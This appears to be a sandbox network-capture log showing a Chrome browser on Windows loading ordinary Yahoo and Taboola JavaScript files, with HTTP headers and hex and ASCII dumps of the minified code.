                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 19 May 2020 03:33:21 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "ca243b22264dca7a4a899c51cc2dc963"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=31536000, public, immutable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC158INData Raw: 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 64 69 76 20 69 64 3d 22 61 64 76 65 72 74 69 73 65 6d 65 6e 74 2d 74 68 61 6d 62 61 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 44 69 73 70 6c 61 79 20 41 64 76 65 72 74 69 73 65 6d 65 6e 74 3c 2f 64 69 76 3e 27 29 3b 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 30 2c 20 59 61 68 6f 6f 21 20 49 6e 63 2e 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              79192.168.2.451106151.101.193.444431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC545OUTGET /libtrc/yahooweb-network/loader.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cdn.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC771INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 1424512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: VQKH2i4iN3QbzhxnpTW8ikafwAb8sxtpuap6lTvYsNLuYN/oCVboeu33Nemv5RmnRUdegn+Sq+c=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 2Y5KA5ZDEQ98BTF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-replication-status: FAILED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 06 Oct 2024 10:01:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "70bf5db8af5c004af377c5cf24d8049b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 2H.iCM4JCs2VjsJlBGAoBD46B.Bs1UhV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 26078
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Served-By: cache-ewr-kewr1740024-EWR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Timer: S1728414819.704805,VS0,VE2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: private,max-age=14401
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              abp: 84
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 36 33 33 37 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 69 66 28 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 22 69 6e 20 77 69 6e 64 6f 77 26 26 22 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 22 69 6e 20 77 69 6e 64 6f 77 2e 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 45 6e 74 72 79 2e 70 72 6f 74 6f 74 79 70 65 29 22 69 73 49 6e 74 65 72 73 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (function(){var __webpack_modules__={6337:function(){!function(){"use strict";if("object"==typeof window)if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)"isIntersec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 65 72 44 6f 63 75 6d 65 6e 74 29 2c 30 3d 3d 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 5f 75 6e 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 28 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 73 63 6f 6e 6e 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 6f 62 73 65 72 76 61 74 69 6f 6e 54 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 75 6e 6d 6f 6e 69 74 6f 72 41 6c 6c 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 28 29 2c 74 68 69 73 2e 5f 75 6e 72 65 67 69 73 74 65 72 49 6e 73 74 61 6e 63 65 28 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 74 61 6b 65 52 65 63 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: erDocument),0==this._observationTargets.length&&this._unregisterInstance()},a.prototype.disconnect=function(){this._observationTargets=[],this._unmonitorAllIntersections(),this._unregisterInstance()},a.prototype.takeRecords=function(){var e=this._queuedEn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 65 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6f 29 2c 73 28 65 2c 22 72 65 73 69 7a 65 22 2c 69 2c 21 30 29 29 2c 73 28 74 2c 22 73 63 72 6f 6c 6c 22 2c 69 2c 21 30 29 2c 61 26 26 61 2e 64 69 73 63 6f 6e 6e 65 63 74 28 29 7d 29 29 3b 76 61 72 20 63 3d 74 68 69 73 2e 72 6f 6f 74 26 26 28 74 68 69 73 2e 72 6f 6f 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 68 69 73 2e 72 6f 6f 74 29 7c 7c 65 3b 69 66 28 74 21 3d 63 29 7b 76 61 72 20 64 3d 72 28 74 29 3b 64 26 26 74 68 69 73 2e 5f 6d 6f 6e 69 74 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 28 64 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 29 7d 7d 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 75 6e 6d 6f 6e 69 74 6f 72 49 6e 74 65 72 73 65 63 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e.clearInterval(o),s(e,"resize",i,!0)),s(t,"scroll",i,!0),a&&a.disconnect()}));var c=this.root&&(this.root.ownerDocument||this.root)||e;if(t!=c){var d=r(t);d&&this._monitorIntersections(d.ownerDocument)}}},a.prototype._unmonitorIntersections=function(t){v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 2e 65 6e 74 72 79 3d 6e 65 77 20 6f 28 7b 74 69 6d 65 3a 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 26 26 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 2c 74 61 72 67 65 74 3a 72 2c 62 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 3a 61 2c 72 6f 6f 74 42 6f 75 6e 64 73 3a 75 2c 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 3a 64 7d 29 3b 73 3f 65 26 26 6c 3f 74 68 69 73 2e 5f 68 61 73 43 72 6f 73 73 65 64 54 68 72 65 73 68 6f 6c 64 28 73 2c 70 29 26 26 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e 74 72 69 65 73 2e 70 75 73 68 28 70 29 3a 73 26 26 73 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 26 26 74 68 69 73 2e 5f 71 75 65 75 65 64 45 6e 74 72 69 65 73 2e 70 75 73 68 28 70 29 3a 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .entry=new o({time:window.performance&&performance.now&&performance.now(),target:r,boundingClientRect:a,rootBounds:u,intersectionRect:d});s?e&&l?this._hasCrossedThreshold(s,p)&&this._queuedEntries.push(p):s&&s.isIntersecting&&this._queuedEntries.push(p):t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 69 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 72 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 77 69 64 74 68 3a 69 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 72 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 62 6f 74 74 6f 6d 3a 69 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7c 7c 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 68 65 69 67 68 74 3a 69 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7c 7c 72 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7d 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 65 78 70 61 6e 64 52 65 63 74 42 79 52 6f 6f 74 4d 61 72 67 69 6e 28 74 29 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 65 78 70 61 6e 64 52 65 63 74 42 79 52 6f 6f 74 4d 61 72 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,left:0,right:i.clientWidth||r.clientWidth,width:i.clientWidth||r.clientWidth,bottom:i.clientHeight||r.clientHeight,height:i.clientHeight||r.clientHeight}}return this._expandRectByRootMargin(t)},a.prototype._expandRectByRootMargin=function(e){var t=this._
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 3d 64 28 65 2e 62 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 29 2c 74 68 69 73 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 3d 64 28 65 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 7c 7c 7b 74 6f 70 3a 30 2c 62 6f 74 74 6f 6d 3a 30 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 7d 29 2c 74 68 69 73 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 3d 21 21 65 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 3b 76 61 72 20 74 3d 74 68 69 73 2e 62 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 2c 6e 3d 74 2e 77 69 64 74 68 2a 74 2e 68 65 69 67 68 74 2c 69 3d 74 68 69 73 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 65 63 74 2c 72 3d 69 2e 77 69 64 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: dingClientRect=d(e.boundingClientRect),this.intersectionRect=d(e.intersectionRect||{top:0,bottom:0,left:0,right:0,width:0,height:0}),this.isIntersecting=!!e.intersectionRect;var t=this.boundingClientRect,n=t.width*t.height,i=this.intersectionRect,r=i.widt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 3b 74 72 79 7b 74 3d 65 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 74 3f 28 74 2e 77 69 64 74 68 26 26 74 2e 68 65 69 67 68 74 7c 7c 28 74 3d 7b 74 6f 70 3a 74 2e 74 6f 70 2c 72 69 67 68 74 3a 74 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 74 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 74 2e 6c 65 66 74 2c 77 69 64 74 68 3a 74 2e 72 69 67 68 74 2d 74 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 74 2e 62 6f 74 74 6f 6d 2d 74 2e 74 6f 70 7d 29 2c 74 29 3a 7b 74 6f 70 3a 30 2c 62 6f 74 74 6f 6d 3a 30 2c 6c 65 66 74 3a 30 2c 72 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 22 78 22 69 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ;try{t=e.getBoundingClientRect()}catch(e){}return t?(t.width&&t.height||(t={top:t.top,right:t.right,bottom:t.bottom,left:t.left,width:t.right-t.left,height:t.bottom-t.top}),t):{top:0,bottom:0,left:0,right:0,width:0,height:0}}function d(e){return!e||"x"in
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 7b 76 61 72 20 74 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 74 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 69 29 7b 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 6e 65 77 20 41 72 72 61 79 28 72 29 3b 69 66 28 30 3d 3d 3d 72 29 72 65 74 75 72 6e 20 6e 28 6f 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 74 28 65 5b 6e 5d 2c 6e 29 7d 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 61 29 7b 74 2e 72 65 73 6f 6c 76 65 28 65 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 61 5d 3d 65 2c 30 3d 3d 2d 2d 72 26 26 6e 28 6f 29 7d 29 2c 69 29 7d 29 29 7d 29 29 7d 2c 74 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: {var t=this;return new t((function(n,i){var r=e.length,o=new Array(r);if(0===r)return n(o);!function(e,t){for(var n=0;n<e.length;n++)t(e[n],n)}(e,(function(e,a){t.resolve(e).then((function(e){o[a]=e,0==--r&&n(o)}),i)}))}))},t.race=function(e){var t=this;r
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 6d 69 73 65 2c 72 3d 65 2e 72 65 73 6f 6c 76 65 2c 6f 3d 65 2e 72 65 6a 65 63 74 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 28 6e 29 3b 76 28 69 2c 72 2c 6f 2c 65 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 6f 28 65 29 7d 7d 7d 74 2e 5f 6f 76 65 72 72 69 64 65 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 65 7d 3b 76 61 72 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 3f 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 69 29 2c 65 3d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: mise,r=e.resolve,o=e.reject;return function(){try{var e=t(n);v(i,r,o,e,e)}catch(e){o(e)}}}t._overrideUnhandledExceptionHandler=function(e){n=e};var m=function(){var e;"undefined"!=typeof window&&window.postMessage?(window.addEventListener("message",i),e=f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC1378INData Raw: 38 34 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 3f 65 2e 66 69 6c 74 65 72 28 6c 29 2e 6c 65 6e 67 74 68 3e 30 3a 21 21 65 2e 6d 6f 64 65 26 26 22 61 6d 70 22 3d 3d 3d 65 2e 66 72 61 6d 65 77 6f 72 6b 7d 76 61 72 20 73 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 65 3b 69 66 28 30 21 3d 3d 73 29 72 65 74 75 72 6e 20 32 3d 3d 3d 73 3b 76 61 72 20 74 3d 6c 28 28 30 2c 61 2e 63 56 29 28 29 29 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2e 69 6e 64 65 78 4f 66 28 22 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6e 65 74 22 29 3e 2d 31 26 26 21 21 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 6f 2e 74 70 2e 63 6f 6e 74 65 78 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 848);function l(e){return e instanceof Array?e.filter(l).length>0:!!e.mode&&"amp"===e.framework}var s=0;function c(){var e;if(0!==s)return 2===s;var t=l((0,a.cV)());return t||(t=window.location.host.indexOf(".ampproject.net")>-1&&!!(null===(e=o.tp.context


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              80192.168.2.45109987.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC538OUTGET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: y0/CrHPnkeWSsqe8Pb/xeR8193y/cf8WO+r8E9/EiCCGVR68Fvm1OmW/p4AkZIJMDdUP/mKW6to=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 63H8JFQ6MHNJ1W2N
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Fri, 04 Oct 2024 12:37:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 24 Jun 2024 16:46:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "6441e6cd44203711a611cd3db3c116b9"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: .aqk3FVBnJFz4qFL0k2URpC7m_x5fmjo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 29171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 369363
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 61 61 73 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 61 61 73 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-caas",[],t):"object"==typeof exports?exports["wafer-caas"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
